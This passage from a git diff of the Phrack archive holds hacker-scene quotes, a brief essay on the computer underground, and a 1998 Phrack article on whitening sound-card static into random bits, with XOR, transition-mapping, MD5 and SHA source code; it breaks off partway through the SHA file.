+"No." -- Agent Steal
+ 
+"Remember when i did that class change for you?" -- U4EA
+
+"How did you know i was gonna say that about butter?" -- Nirva
+
+ "I got approval from Uli to start Chaos Computer Club West, want to be in
+it?" -- Doc Holiday
+
+"Bilbo Baggins, how are youuuuuu" -- Torquemada
+
+----------------[  The future of the computer underground
+
+The future?  Hmm.  Am I the guy to ask?  Maybe.  Things have changed a lot,
+the only thing constant is change.  It seems there is less chivalry nowadays.
+The government and corporations painted a picture of us.  That picture is
+not a pretty one.  They even have a general psychiatric profile we are all
+supposed to fall into.  Movies, like "Hackers" portray us a certain way
+also.  Kids just starting out, see this and immediately it becomes the way
+the underground is.  The Masters of Deception also promoted this image of
+the Computer Underground.  We end up fighting ourselves more than working
+together to accomplish goals.  I remember a time when things weren't like
+that.  There was very little confrontation between hackers, and information
+flowed freely.  If you ask me, its all a big conspiracy :-).  A big conspiracy
+to keep hackers seperated and fighting among themselves.  People like to talk
+to me about the good old days.  Thats all well and good, but those days are
+over.  There can still be another golden age in the Computer Underground.
+The only thing stopping it, is you.
+
+
+----[  EOF
diff --git a/phrack54/5.txt b/phrack54/5.txt
new file mode 100644
index 0000000..05cc45d
--- /dev/null
+++ b/phrack54/5.txt
@@ -0,0 +1,1892 @@
+---[  Phrack Magazine   Volume 8, Issue 54 Dec 25th, 1998, article 05 of 12
+
+
+-------------------------[  Linux and Random Source Bleaching 
+
+
+--------[  Phunda Menta <phundie@usa.net>
+
+
+
+----[  Introduction
+
+Random numbers are often used in cryptography, but good random bits can be
+hard to come by.  Linux has two useful pseudo-devices called /dev/random and
+/dev/urandom.  Catting /dev/random yields a small pool of random bits obtained
+from internal system state.  If you cat this output to your terminal and bang
+on some keys, you'll notice that you get more random bits.  Disk drive
+accesses, IRQ timings, and key presses; all of this stuff gets hashed into
+a small pool of entropy that can be accessed directly from /dev/random.
+/dev/urandom is a stream that hashes /dev/random, and gives you that hash
+value; then it hashes the last hash and the pool forever.  Both give a
+decent source of random bits.  By default, /dev/urandom uses SHA (I know
+the source comments claim MD5, but if you look at the code, it is SHA).
+
+So /dev/urandom is a decent source of pseudo-random bits.  /dev/random
+is better, but it is of limited size.
+
+These are very useful, but what we really want is a hardware source of random
+bits. 
+
+
+----[  The Hardware Solution
+
+Most computers have sound cards these days, and a sound card is a
+great source of potential entropy. 
+
+Unplug the microphone from your soundcard and cat /dev/audio to a file.
+Sample maybe 2 or 300k of data.  Now play it back, if it sounds like static,
+you can skip ahead to cleaning up the source.  You can also try plugging a
+1/8th jack (or whatever you use for input) that has dead-end leads into
+the mic port.  Try both of these methods and find one that gives a clean
+static hiss.
+
+Chances are that on playback all you have is silence, but we want static.
+Static is random, and randomness is our goal here, so grab an FM radio and
+tune it to the high end, around 106 or 107 MHz.  Find a frequency that gives a
+good clean hiss, an analog tuner is best for this.  If you have a digital
+tuner and can't get the precision needed to tune-in a good static source then
+get the best static you can, but you might have a harder time cleaning up this
+source.  If your signal has a high-pitched tone present you can clean this out
+in a few different ways.  The easiest is to use software to strip out that
+frequency.  There is a family of programs for Linux that can help with this
+(Bio, Mammut, and Ceres).  These programs allow very good visualization of the
+signal and they also allow you to pull the signal apart and isolate different
+frequencies.  Chances are you will have a bunch of junk in the 60 Hz region,
+probably due to EMI (electro-magnetic interference) from power supplies, along
+with whatever is giving you that tone.
+
+In either case you should shield your FM receiver and the audio cable to avoid
+EMI.  You may be able you shield your soundcard, but I am skeptical of the
+worth of this.  A lot of electronics supply houses sell shielding wrap and
+preshielded cables.  You can also try aluminum foil.  I haven't had much luck
+with aluminum foil, but some people swear by it. 
+
+Once you have your source set up, jack it into your sound card and sample it
+at 44 kHz.  Run the results through the Diehard testing package (a battery of
+tests to evaluate the strength of random number generators).  Your source
+won't pass the test.
+
+Clean up your source bytes however you need to.  Strip out any 60 Hz junk with
+Mammut by using the Transform|Filter options, you can then use the
+Transform|Phase Shift option to slide the wave form back into place so that
+there is no gap at 60 Hz.  If your static source has a small amplitude, crank
+it up by increasing the hardware gain, or use Mammut to change the derivative
+or the effective gain, whichever you like.  I have found no empirical evidence
+to suggest that one way works better than the others, but, theoretically,
+changing the slope may be a Bad Thing (tm).  You may also want to use the
+Phase Shift and Threshold options to chop up your signal.  You can
+resynthesize the parts and save them back out.  Listening to these parts, and
+graphing them can help give you an idea of what other things your source
+signal is doing. 
+
+If push comes to shove, and you can't weed out all of the bias, or if you need
+a more hands-free way to clean up the source (and don't have the time or skill
+to write custom filters) you can just use a cryptographic hash.
+
+After you clean up your source, take a look at it with ceres or bio, if the
+output looks like video static with no noticeable patterns or hot/cold areas
+then you have sufficiently cleaned up the signal, now you can move on to
+bleaching the static for use as a random number stream.
+
+As a side note, if you ever want to see what a good random distribution is
+supposed to look like, you can also use output from /dev/urandom.  Use sox
+(stock with Redhat distros) to convert the output stream of /dev/urandom
+(use a type of 'ul') to AIFF for mammut, or ceres or whatever.  The
+distribution given by /dev/urandom is statistically random so it will tell us
+what to look for, but /dev/urandom (SHA, basically) is still pseudo-random
+since complete knowledge of the previous inputs allows us to calculate all
+future outputs.  This is not so with static.
+
+
+----[  Bleaching the data stream
+
+The static coming out of your FM source is skewed white noise.  We need to
+clean it up, so we bleach it.
+
+RFC1750 gives a slew of methods to clean up your source.  One of the simplest,
+effective methods of whitening a source is to XOR all the bits in a byte
+together, yielding one output bit.  These bits are then reconstructed into
+a byte and output.  This method has a few advantages.  The first big advantage
+is that you know precisely how many bytes you need to sample in order obtain a
+certain number of output bytes.  XORing is also fast, and easy to implement.
+
+Another method of deskewing data is attributed to John von Neumann in RFC1750.
+This method is called transition mapping.  Transition mapping is a relatively
+simple process.  We take two bits from our input.  If this bit sequence is 01
+or 10 we output a 0 or a 1, respectively. The sequences 00 and 11 are
+discarded.  This method completely deskews a stream of data at the expense
+of needing an unknown number of input bits.  Transition mapping is also a
+very fast process, and on a lightly skewed input transition mapping can yield
+more output bits than XOR.
+
+Both XOR and transition mapping are fast processes that are good enough to
+deskew a set of bits such that they will pass the Diehard suite of tests,
+if the input is suitably clean and random.  If the input is somehow correlated,
+you will have a harder time getting it to pass Diehard.  I have found that
+correlated sources can be cleaned up by XORing the output of an XOR
+distillation with the output of a transition mapped distillation.
+
+Slower constructions can be created out of cryptographic hash functions,
+but may be trusted more by the paranoid.  Hash functions are also recommended
+if an attacker has the means to somehow affect your random source.  If you
+are worried about this attack, a good way to solve it is with appeal to
+/dev/random.  Use a block cipher such as 3DES to encrypt your random
+source with a key and initialization vector obtained from /dev/random.  If an
+attacker can bias your source in a predictable way, he still has no idea
+what bytes you may be using for your actual random numbers.  Skew that the
+attack may introduce into your hardware can first be cleaned with a process
+like transition mapping and then pumped through a looped hash function or a
+block cipher. 
+
+The output of a (decent) hash function or block cipher will pass the
+Diehard tests. 
+
+In a heavily used machine, where the entropy pool used by /dev/random will be
+updated frequently, the output from the above processes can be XORed byte
+for byte with the stream from /dev/urandom.  This is a simple method to mix
+the streams together for added security.  Another method would be to hash
+N/2 bytes from /dev/urandom and N/2 bytes from your source together, where
+N is the number of bytes that your hash function will yield.
+
+All of these methods are suitable to deskew a data set, but they should not be
+used blindly.  Before putting the resulting bits to use, examine several
+samples with Diehard and graphic or spectral tests.
+
+I have included code to do XOR, transition mapping along with hashing
+mechanisms..  I have plenty of code to do other hash and block cipher based
+stuff too, but I did not include that here because the code is not
+self-contained (it needs some crypto libs).
+
+If you want to contact me about the code or if you have some comments or
+suggestions, I can be reached at phundie@usa.net.
+
+
+----[  References and Related stuff:
+
+RFC1750 Randomness Recommendations for Security
+	http://www.kobira.co.jp/document/rfc/RFC1750.txt
+
+Diehard Test Suite
+	http://stat.fsu.edu/~geo/diehard.html
+
+Pseudo-Random Number Conditioning
+	http://www.clark.net/pub/cme/html/ranno.html
+
+Linux MIDI & Sound Applications (has links to Mammut, Bio and Ceres)
+	http://www.bright.net/~dlphilp/linux_soundapps.html
+
+----[  The code
+
+
+<++> bleach/Makefile
+all:
+	gcc -w -c md5/md5.c
+	gcc -c sha/shs.c
+	gcc -o sha_distill sha_distill.c shs.o 
+	gcc -o md5_distill md5_distill.c md5.o
+	gcc -o xor_distill xor_distill.c
+	gcc -o transmap transmap.c
+<-->
+
+<++> bleach/md5/md5.c
+/*
+ ***********************************************************************
+ ** md5.c -- the source code for MD5 routines                         **
+ ** RSA Data Security, Inc. MD5 Message-Digest Algorithm              **
+ ** Created: 2/17/90 RLR                                              **
+ ** Revised: 1/91 SRD,AJ,BSK,JT Reference C ver., 7/10 constant corr. **
+ ***********************************************************************
+ */
+
+/*
+ ***********************************************************************
+ ** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved.  **
+ **                                                                   **
+ ** License to copy and use this software is granted provided that    **
+ ** it is identified as the "RSA Data Security, Inc. MD5 Message-     **
+ ** Digest Algorithm" in all material mentioning or referencing this  **
+ ** software or this function.                                        **
+ **                                                                   **
+ ** License is also granted to make and use derivative works          **
+ ** provided that such works are identified as "derived from the RSA  **
+ ** Data Security, Inc. MD5 Message-Digest Algorithm" in all          **
+ ** material mentioning or referencing the derived work.              **
+ **                                                                   **
+ ** RSA Data Security, Inc. makes no representations concerning       **
+ ** either the merchantability of this software or the suitability    **
+ ** of this software for any particular purpose.  It is provided "as  **
+ ** is" without express or implied warranty of any kind.              **
+ **                                                                   **
+ ** These notices must be retained in any copies of any part of this  **
+ ** documentation and/or software.                                    **
+ ***********************************************************************
+ */
+
+#include "md5.h"
+
+/*
+ ***********************************************************************
+ **  Message-digest routines:                                         **
+ **  To form the message digest for a message M                       **
+ **    (1) Initialize a context buffer mdContext using MD5Init        **
+ **    (2) Call MD5Update on mdContext and M                          **
+ **    (3) Call MD5Final on mdContext                                 **
+ **  The message digest is now in mdContext->digest[0...15]           **
+ ***********************************************************************
+ */
+
+/* forward declaration */
+static void Transform ();
+
+static unsigned char PADDING[64] = {
+  0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
+};
+
+/* F, G, H and I are basic MD5 functions */
+#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
+#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
+#define H(x, y, z) ((x) ^ (y) ^ (z))
+#define I(x, y, z) ((y) ^ ((x) | (~z)))
+
+/* ROTATE_LEFT rotates x left n bits */
+#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))
+
+/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4 */
+/* Rotation is separate from addition to prevent recomputation */
+#define FF(a, b, c, d, x, s, ac) \
+  {(a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
+   (a) = ROTATE_LEFT ((a), (s)); \
+   (a) += (b); \
+  }
+#define GG(a, b, c, d, x, s, ac) \
+  {(a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
+   (a) = ROTATE_LEFT ((a), (s)); \
+   (a) += (b); \
+  }
+#define HH(a, b, c, d, x, s, ac) \
+  {(a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
+   (a) = ROTATE_LEFT ((a), (s)); \
+   (a) += (b); \
+  }
+#define II(a, b, c, d, x, s, ac) \
+  {(a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
+   (a) = ROTATE_LEFT ((a), (s)); \
+   (a) += (b); \
+  }
+
+/* The routine MD5Init initializes the message-digest context
+   mdContext. All fields are set to zero.
+ */
+void MD5Init (mdContext)
+MD5_CTX *mdContext;
+{
+  mdContext->i[0] = mdContext->i[1] = (UINT4)0;
+
+  /* Load magic initialization constants.
+   */
+  mdContext->buf[0] = (UINT4)0x67452301;
+  mdContext->buf[1] = (UINT4)0xefcdab89;
+  mdContext->buf[2] = (UINT4)0x98badcfe;
+  mdContext->buf[3] = (UINT4)0x10325476;
+}
+
+/* The routine MD5Update updates the message-digest context to
+   account for the presence of each of the characters inBuf[0..inLen-1]
+   in the message whose digest is being computed.
+ */
+void MD5Update (mdContext, inBuf, inLen)
+MD5_CTX *mdContext;
+unsigned char *inBuf;
+unsigned int inLen;
+{
+  UINT4 in[16];
+  int mdi;
+  unsigned int i, ii;
+
+  /* compute number of bytes mod 64 */
+  mdi = (int)((mdContext->i[0] >> 3) & 0x3F);
+
+  /* update number of bits */
+  if ((mdContext->i[0] + ((UINT4)inLen << 3)) < mdContext->i[0])
+    mdContext->i[1]++;
+  mdContext->i[0] += ((UINT4)inLen << 3);
+  mdContext->i[1] += ((UINT4)inLen >> 29);
+
+  while (inLen--) {
+    /* add new character to buffer, increment mdi */
+    mdContext->in[mdi++] = *inBuf++;
+
+    /* transform if necessary */
+    if (mdi == 0x40) {
+      for (i = 0, ii = 0; i < 16; i++, ii += 4)
+        in[i] = (((UINT4)mdContext->in[ii+3]) << 24) |
+                (((UINT4)mdContext->in[ii+2]) << 16) |
+                (((UINT4)mdContext->in[ii+1]) << 8) |
+                ((UINT4)mdContext->in[ii]);
+      Transform (mdContext->buf, in);
+      mdi = 0;
+    }
+  }
+}
+
+/* The routine MD5Final terminates the message-digest computation and
+   ends with the desired message digest in mdContext->digest[0...15].
+ */
+void MD5Final (mdContext)
+MD5_CTX *mdContext;
+{
+  UINT4 in[16];
+  int mdi;
+  unsigned int i, ii;
+  unsigned int padLen;
+
+  /* save number of bits */
+  in[14] = mdContext->i[0];
+  in[15] = mdContext->i[1];
+
+  /* compute number of bytes mod 64 */
+  mdi = (int)((mdContext->i[0] >> 3) & 0x3F);
+
+  /* pad out to 56 mod 64 */
+  padLen = (mdi < 56) ? (56 - mdi) : (120 - mdi);
+  MD5Update (mdContext, PADDING, padLen);
+
+  /* append length in bits and transform */
+  for (i = 0, ii = 0; i < 14; i++, ii += 4)
+    in[i] = (((UINT4)mdContext->in[ii+3]) << 24) |
+            (((UINT4)mdContext->in[ii+2]) << 16) |
+            (((UINT4)mdContext->in[ii+1]) << 8) |
+            ((UINT4)mdContext->in[ii]);
+  Transform (mdContext->buf, in);
+
+  /* store buffer in digest */
+  for (i = 0, ii = 0; i < 4; i++, ii += 4) {
+    mdContext->digest[ii] = (unsigned char)(mdContext->buf[i] & 0xFF);
+    mdContext->digest[ii+1] =
+      (unsigned char)((mdContext->buf[i] >> 8) & 0xFF);
+    mdContext->digest[ii+2] =
+      (unsigned char)((mdContext->buf[i] >> 16) & 0xFF);
+    mdContext->digest[ii+3] =
+      (unsigned char)((mdContext->buf[i] >> 24) & 0xFF);
+  }
+}
+
+/* Basic MD5 step. Transforms buf based on in.
+ */
+static void Transform (buf, in)
+UINT4 *buf;
+UINT4 *in;
+{
+  UINT4 a = buf[0], b = buf[1], c = buf[2], d = buf[3];
+
+  /* Round 1 */
+#define S11 7
+#define S12 12
+#define S13 17
+#define S14 22
+  FF ( a, b, c, d, in[ 0], S11, 3614090360); /* 1 */
+  FF ( d, a, b, c, in[ 1], S12, 3905402710); /* 2 */
+  FF ( c, d, a, b, in[ 2], S13,  606105819); /* 3 */
+  FF ( b, c, d, a, in[ 3], S14, 3250441966); /* 4 */
+  FF ( a, b, c, d, in[ 4], S11, 4118548399); /* 5 */
+  FF ( d, a, b, c, in[ 5], S12, 1200080426); /* 6 */
+  FF ( c, d, a, b, in[ 6], S13, 2821735955); /* 7 */
+  FF ( b, c, d, a, in[ 7], S14, 4249261313); /* 8 */
+  FF ( a, b, c, d, in[ 8], S11, 1770035416); /* 9 */
+  FF ( d, a, b, c, in[ 9], S12, 2336552879); /* 10 */
+  FF ( c, d, a, b, in[10], S13, 4294925233); /* 11 */
+  FF ( b, c, d, a, in[11], S14, 2304563134); /* 12 */
+  FF ( a, b, c, d, in[12], S11, 1804603682); /* 13 */
+  FF ( d, a, b, c, in[13], S12, 4254626195); /* 14 */
+  FF ( c, d, a, b, in[14], S13, 2792965006); /* 15 */
+  FF ( b, c, d, a, in[15], S14, 1236535329); /* 16 */
+
+  /* Round 2 */
+#define S21 5
+#define S22 9
+#define S23 14
+#define S24 20
+  GG ( a, b, c, d, in[ 1], S21, 4129170786); /* 17 */
+  GG ( d, a, b, c, in[ 6], S22, 3225465664); /* 18 */
+  GG ( c, d, a, b, in[11], S23,  643717713); /* 19 */
+  GG ( b, c, d, a, in[ 0], S24, 3921069994); /* 20 */
+  GG ( a, b, c, d, in[ 5], S21, 3593408605); /* 21 */
+  GG ( d, a, b, c, in[10], S22,   38016083); /* 22 */
+  GG ( c, d, a, b, in[15], S23, 3634488961); /* 23 */
+  GG ( b, c, d, a, in[ 4], S24, 3889429448); /* 24 */
+  GG ( a, b, c, d, in[ 9], S21,  568446438); /* 25 */
+  GG ( d, a, b, c, in[14], S22, 3275163606); /* 26 */
+  GG ( c, d, a, b, in[ 3], S23, 4107603335); /* 27 */
+  GG ( b, c, d, a, in[ 8], S24, 1163531501); /* 28 */
+  GG ( a, b, c, d, in[13], S21, 2850285829); /* 29 */
+  GG ( d, a, b, c, in[ 2], S22, 4243563512); /* 30 */
+  GG ( c, d, a, b, in[ 7], S23, 1735328473); /* 31 */
+  GG ( b, c, d, a, in[12], S24, 2368359562); /* 32 */
+
+  /* Round 3 */
+#define S31 4
+#define S32 11
+#define S33 16
+#define S34 23
+  HH ( a, b, c, d, in[ 5], S31, 4294588738); /* 33 */
+  HH ( d, a, b, c, in[ 8], S32, 2272392833); /* 34 */
+  HH ( c, d, a, b, in[11], S33, 1839030562); /* 35 */
+  HH ( b, c, d, a, in[14], S34, 4259657740); /* 36 */
+  HH ( a, b, c, d, in[ 1], S31, 2763975236); /* 37 */
+  HH ( d, a, b, c, in[ 4], S32, 1272893353); /* 38 */
+  HH ( c, d, a, b, in[ 7], S33, 4139469664); /* 39 */
+  HH ( b, c, d, a, in[10], S34, 3200236656); /* 40 */
+  HH ( a, b, c, d, in[13], S31,  681279174); /* 41 */
+  HH ( d, a, b, c, in[ 0], S32, 3936430074); /* 42 */
+  HH ( c, d, a, b, in[ 3], S33, 3572445317); /* 43 */
+  HH ( b, c, d, a, in[ 6], S34,   76029189); /* 44 */
+  HH ( a, b, c, d, in[ 9], S31, 3654602809); /* 45 */
+  HH ( d, a, b, c, in[12], S32, 3873151461); /* 46 */
+  HH ( c, d, a, b, in[15], S33,  530742520); /* 47 */
+  HH ( b, c, d, a, in[ 2], S34, 3299628645); /* 48 */
+
+  /* Round 4 */
+#define S41 6
+#define S42 10
+#define S43 15
+#define S44 21
+  II ( a, b, c, d, in[ 0], S41, 4096336452); /* 49 */
+  II ( d, a, b, c, in[ 7], S42, 1126891415); /* 50 */
+  II ( c, d, a, b, in[14], S43, 2878612391); /* 51 */
+  II ( b, c, d, a, in[ 5], S44, 4237533241); /* 52 */
+  II ( a, b, c, d, in[12], S41, 1700485571); /* 53 */
+  II ( d, a, b, c, in[ 3], S42, 2399980690); /* 54 */
+  II ( c, d, a, b, in[10], S43, 4293915773); /* 55 */
+  II ( b, c, d, a, in[ 1], S44, 2240044497); /* 56 */
+  II ( a, b, c, d, in[ 8], S41, 1873313359); /* 57 */
+  II ( d, a, b, c, in[15], S42, 4264355552); /* 58 */
+  II ( c, d, a, b, in[ 6], S43, 2734768916); /* 59 */
+  II ( b, c, d, a, in[13], S44, 1309151649); /* 60 */
+  II ( a, b, c, d, in[ 4], S41, 4149444226); /* 61 */
+  II ( d, a, b, c, in[11], S42, 3174756917); /* 62 */
+  II ( c, d, a, b, in[ 2], S43,  718787259); /* 63 */
+  II ( b, c, d, a, in[ 9], S44, 3951481745); /* 64 */
+
+  buf[0] += a;
+  buf[1] += b;
+  buf[2] += c;
+  buf[3] += d;
+}
+
+/*
+ ***********************************************************************
+ ** End of md5.c                                                      **
+ ******************************** (cut) ********************************
+ */
+<-->
+<++> bleach/md5/md5c.h
+/*
+ ***********************************************************************
+ ** md5.h -- header file for implementation of MD5                    **
+ ** RSA Data Security, Inc. MD5 Message-Digest Algorithm              **
+ ** Created: 2/17/90 RLR                                              **
+ ** Revised: 12/27/90 SRD,AJ,BSK,JT Reference C version               **
+ ** Revised (for MD5): RLR 4/27/91                                    **
+ **   -- G modified to have y&~z instead of y&z                       **
+ **   -- FF, GG, HH modified to add in last register done             **
+ **   -- Access pattern: round 2 works mod 5, round 3 works mod 3     **
+ **   -- distinct additive constant for each step                     **
+ **   -- round 4 added, working mod 7                                 **
+ ***********************************************************************
+ */
+
+/*
+ ***********************************************************************
+ ** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved.  **
+ **                                                                   **
+ ** License to copy and use this software is granted provided that    **
+ ** it is identified as the "RSA Data Security, Inc. MD5 Message-     **
+ ** Digest Algorithm" in all material mentioning or referencing this  **
+ ** software or this function.                                        **
+ **                                                                   **
+ ** License is also granted to make and use derivative works          **
+ ** provided that such works are identified as "derived from the RSA  **
+ ** Data Security, Inc. MD5 Message-Digest Algorithm" in all          **
+ ** material mentioning or referencing the derived work.              **
+ **                                                                   **
+ ** RSA Data Security, Inc. makes no representations concerning       **
+ ** either the merchantability of this software or the suitability    **
+ ** of this software for any particular purpose.  It is provided "as  **
+ ** is" without express or implied warranty of any kind.              **
+ **                                                                   **
+ ** These notices must be retained in any copies of any part of this  **
+ ** documentation and/or software.                                    **
+ ***********************************************************************
+ */
+
+/* typedef a 32-bit type */
+typedef unsigned long int UINT4;
+
+/* Data structure for MD5 (Message-Digest) computation */
+typedef struct {
+  UINT4 i[2];                   /* number of _bits_ handled mod 2^64 */
+  UINT4 buf[4];                                    /* scratch buffer */
+  unsigned char in[64];                              /* input buffer */
+  unsigned char digest[16];     /* actual digest after MD5Final call */
+} MD5_CTX;
+
+void MD5Init ();
+void MD5Update ();
+void MD5Final ();
+
+/*
+ ***********************************************************************
+ ** End of md5.h                                                      **
+ ******************************** (cut) ********************************
+ */
+<-->
+
+<++> bleach/md5_distill.c
+#include <stdio.h>
+#include "md5/md5.h"
+
+main ()
+{
+	MD5_CTX md5Info;
+	
+	unsigned char c[16];
+
+	while (fread(c, 1,16,stdin) == 16)
+	{
+		MD5Init(&md5Info);
+		MD5Update(&md5Info,c,16);
+		MD5Final(&md5Info);
+		fwrite(md5Info.digest,1,16,stdout);
+	}
+}
+<-->
+
+<++> bleach/sha/shs.c
+/* --------------------------------- SHS.C ------------------------------- */
+
+/*
+ * NIST proposed Secure Hash Standard.
+ *
+ * Written 2 September 1992, Peter C. Gutmann.
+ * This implementation placed in the public domain.
+ *
+ * Comments to pgut1@cs.aukuni.ac.nz
+ */
+
+#include <string.h>
+#include "shs.h"
+
+/* The SHS f()-functions */
+
+#define f1(x,y,z)   ( ( x & y ) | ( ~x & z ) )		  /* Rounds  0-19 */
+#define f2(x,y,z)   ( x ^ y ^ z )			  /* Rounds 20-39 */
+#define f3(x,y,z)   ( ( x & y ) | ( x & z ) | ( y & z ) ) /* Rounds 40-59 */
+#define f4(x,y,z)   ( x ^ y ^ z )			  /* Rounds 60-79 */
+
+/* The SHS Mysterious Constants */
+
+#define K1  0x5A827999L 	/* Rounds  0-19 */
+#define K2  0x6ED9EBA1L 	/* Rounds 20-39 */
+#define K3  0x8F1BBCDCL 	/* Rounds 40-59 */
+#define K4  0xCA62C1D6L 	/* Rounds 60-79 */
+
+/* SHS initial values */
+
+#define h0init	0x67452301L
+#define h1init	0xEFCDAB89L
+#define h2init	0x98BADCFEL
+#define h3init	0x10325476L
+#define h4init	0xC3D2E1F0L
+
+/* 32-bit rotate - kludged with shifts */
+
+#define S(n,X)	((X << n) | (X >> (32 - n)))
+
+/* The initial expanding function */
+
+#define expand(count)	W [count] = W [count - 3] ^ W [count - 8] ^ W [count - 14] ^ W [count - 16]
+
+/* The four SHS sub-rounds */
+
+#define subRound1(count)    \
+	{ \
+		temp = S (5, A) + f1 (B, C, D) + E + W [count] + K1; \
+		E = D; \
+		D = C; \
+		C = S (30, B); \
+		B = A; \
+		A = temp; \
+	}
+
+#define subRound2(count)    \
+	{ \
+		temp = S (5, A) + f2 (B, C, D) + E + W [count] + K2; \
+		E = D; \
+		D = C; \
+		C = S (30, B); \
+		B = A; \
+		A = temp; \
+	}
+
+#define subRound3(count)    \
+	{ \
+		temp = S (5, A) + f3 (B, C, D) + E + W [count] + K3; \
+		E = D; \
+		D = C; \
+		C = S (30, B); \
+		B = A; \
+		A = temp; \
+	}
+
+#define subRound4(count)    \
+	{ \
+		temp = S (5, A) + f4 (B, C, D) + E + W [count] + K4; \
+		E = D; \
+		D = C; \
+		C = S (30, B); \
+		B = A; \
+		A = temp; \
+	}
+
+/* The two buffers of 5 32-bit words */
+
+LONG h0, h1, h2, h3, h4;
+LONG A, B, C, D, E;
+
+local void byteReverse OF((LONG *buffer, int byteCount));
+void shsTransform OF((SHS_INFO *shsInfo));
+
+/* Initialize the SHS values */
+
+void shsInit (shsInfo)
+	SHS_INFO *shsInfo;
+{
+	/* Set the h-vars to their initial values */
+	shsInfo->digest [0] = h0init;
+	shsInfo->digest [1] = h1init;
+	shsInfo->digest [2] = h2init;
+	shsInfo->digest [3] = h3init;
+	shsInfo->digest [4] = h4init;
+
+	/* Initialise bit count */
+	shsInfo->countLo = shsInfo->countHi = 0L;
+}
+
+/*
+ * Perform the SHS transformation.  Note that this code, like MD5, seems to
+ * break some optimizing compilers - it may be necessary to split it into
+ * sections, eg based on the four subrounds
+ */
+
+void shsTransform (shsInfo)
+	SHS_INFO *shsInfo;
+{
+	LONG W [80], temp;
+	int i;
+
+	/* Step A.	Copy the data buffer into the local work buffer */
+	for (i = 0; i < 16; i++)
+		W [i] = shsInfo->data [i];
+
+	/* Step B.	Expand the 16 words into 64 temporary data words */
+	expand (16); expand (17); expand (18); expand (19); expand (20);
+	expand (21); expand (22); expand (23); expand (24); expand (25);
+	expand (26); expand (27); expand (28); expand (29); expand (30);
+	expand (31); expand (32); expand (33); expand (34); expand (35);
+	expand (36); expand (37); expand (38); expand (39); expand (40);
+	expand (41); expand (42); expand (43); expand (44); expand (45);
+	expand (46); expand (47); expand (48); expand (49); expand (50);
+	expand (51); expand (52); expand (53); expand (54); expand (55);
+	expand (56); expand (57); expand (58); expand (59); expand (60);
+	expand (61); expand (62); expand (63); expand (64); expand (65);
+	expand (66); expand (67); expand (68); expand (69); expand (70);
+	expand (71); expand (72); expand (73); expand (74); expand (75);
+	expand (76); expand (77); expand (78); expand (79);
+
+	/* Step C.	Set up first buffer */
+	A = shsInfo->digest [0];
+	B = shsInfo->digest [1];
+	C = shsInfo->digest [2];
+	D = shsInfo->digest [3];
+	E = shsInfo->digest [4];
+
+	/* Step D.	Serious mangling, divided into four sub-rounds */
+	subRound1  (0); subRound1  (1); subRound1  (2); subRound1  (3);
+	subRound1  (4); subRound1  (5); subRound1  (6); subRound1  (7);
+	subRound1  (8); subRound1  (9); subRound1 (10); subRound1 (11);
+	subRound1 (12); subRound1 (13); subRound1 (14); subRound1 (15);
+	subRound1 (16); subRound1 (17); subRound1 (18); subRound1 (19);
+
+	subRound2 (20); subRound2 (21); subRound2 (22); subRound2 (23);
+	subRound2 (24); subRound2 (25); subRound2 (26); subRound2 (27);
+	subRound2 (28); subRound2 (29); subRound2 (30); subRound2 (31);
+	subRound2 (32); subRound2 (33); subRound2 (34); subRound2 (35);
+	subRound2 (36); subRound2 (37); subRound2 (38); subRound2 (39);
+
+	subRound3 (40); subRound3 (41); subRound3 (42); subRound3 (43);
+	subRound3 (44); subRound3 (45); subRound3 (46); subRound3 (47);
+	subRound3 (48); subRound3 (49); subRound3 (50); subRound3 (51);
+	subRound3 (52); subRound3 (53); subRound3 (54); subRound3 (55);
+	subRound3 (56); subRound3 (57); subRound3 (58); subRound3 (59);
+
+	subRound4 (60); subRound4 (61); subRound4 (62); subRound4 (63);
+	subRound4 (64); subRound4 (65); subRound4 (66); subRound4 (67);
+	subRound4 (68); subRound4 (69); subRound4 (70); subRound4 (71);
+	subRound4 (72); subRound4 (73); subRound4 (74); subRound4 (75);
+	subRound4 (76); subRound4 (77); subRound4 (78); subRound4 (79);
+
+	/* Step E.	Build message digest */
+	shsInfo->digest [0] += A;
+	shsInfo->digest [1] += B;
+	shsInfo->digest [2] += C;
+	shsInfo->digest [3] += D;
+	shsInfo->digest [4] += E;
+}
+
+local void byteReverse (buffer, byteCount)
+	LONG *buffer;
+	int byteCount;
+{
+	LONG value;
+	int count;
+
+	/*
+	 * Find out what the byte order is on this machine.
+	 * Big endian is for machines that place the most significant byte
+	 * first (eg. Sun SPARC). Little endian is for machines that place
+	 * the least significant byte first (eg. VAX).
+	 *
+	 * We figure out the byte order by stuffing a 2 byte string into a
+	 * short and examining the left byte. '@' = 0x40  and  'P' = 0x50
+	 * If the left byte is the 'high' byte, then it is 'big endian'.
+	 * If the left byte is the 'low' byte, then the machine is 'little
+	 * endian'.
+	 *
+	 *                          -- Shawn A. Clifford (sac@eng.ufl.edu)
+	 */
+
+	/*
+	 * Several bugs fixed       -- Pat Myrto (pat@rwing.uucp)
+	 */
+
+	if ((*(unsigned short *) ("@P") >> 8) == '@')
+		return;
+
+	byteCount /= sizeof (LONG);
+	for (count = 0; count < byteCount; count++) {
+		value = (buffer [count] << 16) | (buffer [count] >> 16);
+		buffer [count] = ((value & 0xFF00FF00L) >> 8) | ((value & 0x00FF00FFL) << 8);
+	}
+}
+
+/*
+ * Update SHS for a block of data.  This code assumes that the buffer size is
